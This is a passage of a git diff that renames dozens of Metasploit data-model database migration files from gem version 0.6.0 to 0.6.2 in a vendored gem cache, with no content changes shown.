diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/008_create_users.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/008_create_users.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/009_add_loots_ctype.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/009_add_loots_ctype.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/010_add_alert_fields.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/010_add_alert_fields.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/011_add_reports.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/011_add_reports.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/012_add_tasks.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/012_add_tasks.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/013_add_tasks_result.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/013_add_tasks_result.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/014_add_loots_fields.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/014_add_loots_fields.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/015_rename_user.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/015_rename_user.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/016_add_host_purpose.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/016_add_host_purpose.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/017_expand_info2.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/017_expand_info2.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/018_add_workspace_user_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/018_add_workspace_user_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/019_add_workspace_desc.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/019_add_workspace_desc.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/020_add_user_preferences.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/020_add_user_preferences.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/021_standardize_info_and_data.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/021_standardize_info_and_data.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/022_enlarge_event_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/022_enlarge_event_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/023_add_report_downloaded_at.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/023_add_report_downloaded_at.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/024_convert_service_info_to_text.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/024_convert_service_info_to_text.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/025_add_user_admin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/025_add_user_admin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/026_add_creds_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/026_add_creds_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100819123300_migrate_cred_data.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100819123300_migrate_cred_data.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100824151500_add_exploited_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100824151500_add_exploited_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100908001428_add_owner_to_workspaces.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100908001428_add_owner_to_workspaces.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100911122000_add_report_templates.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100911122000_add_report_templates.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916151530_require_admin_flag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916151530_require_admin_flag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916175000_add_campaigns_and_templates.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916175000_add_campaigns_and_templates.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100920012100_add_generate_exe_column.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100920012100_add_generate_exe_column.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100926214000_add_template_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100926214000_add_template_prefs.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101001000000_add_web_tables.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101001000000_add_web_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101002000000_add_query.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101002000000_add_query.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101007000000_add_vuln_info.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101007000000_add_vuln_info.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101008111800_add_clients_to_campaigns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101008111800_add_clients_to_campaigns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101009023300_add_campaign_attachments.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101009023300_add_campaign_attachments.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101104135100_add_imported_creds.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101104135100_add_imported_creds.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000000_fix_web_tables.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000000_fix_web_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000001_expand_host_comment.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000001_expand_host_comment.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110204112800_add_host_tags.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110204112800_add_host_tags.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110317144932_add_session_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110317144932_add_session_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110414180600_add_local_id_to_session_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110414180600_add_local_id_to_session_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110415175705_add_routes_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110415175705_add_routes_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110422000000_convert_binary.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110422000000_convert_binary.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110425095900_add_last_seen_to_sessions.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110425095900_add_last_seen_to_sessions.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110513143900_track_successful_exploits.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110513143900_track_successful_exploits.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000000_add_task_id_to_reports_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000000_add_task_id_to_reports_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000001_add_api_keys_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000001_add_api_keys_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110606000001_add_macros_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110606000001_add_macros_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110622000000_add_settings_to_tasks_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110622000000_add_settings_to_tasks_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110624000001_add_listeners_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110624000001_add_listeners_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110625000001_add_macro_to_listeners_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110625000001_add_macro_to_listeners_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000001_add_nexpose_consoles_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000001_add_nexpose_consoles_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110717000001_add_profiles_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110717000001_add_profiles_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110727163801_expand_cred_ptype_column.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110727163801_expand_cred_ptype_column.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110730000001_add_initial_indexes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110730000001_add_initial_indexes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110812000001_prune_indexes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110812000001_prune_indexes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110922000000_expand_notes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110922000000_expand_notes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110928101300_add_mod_ref_table.rb
similarity index 100%
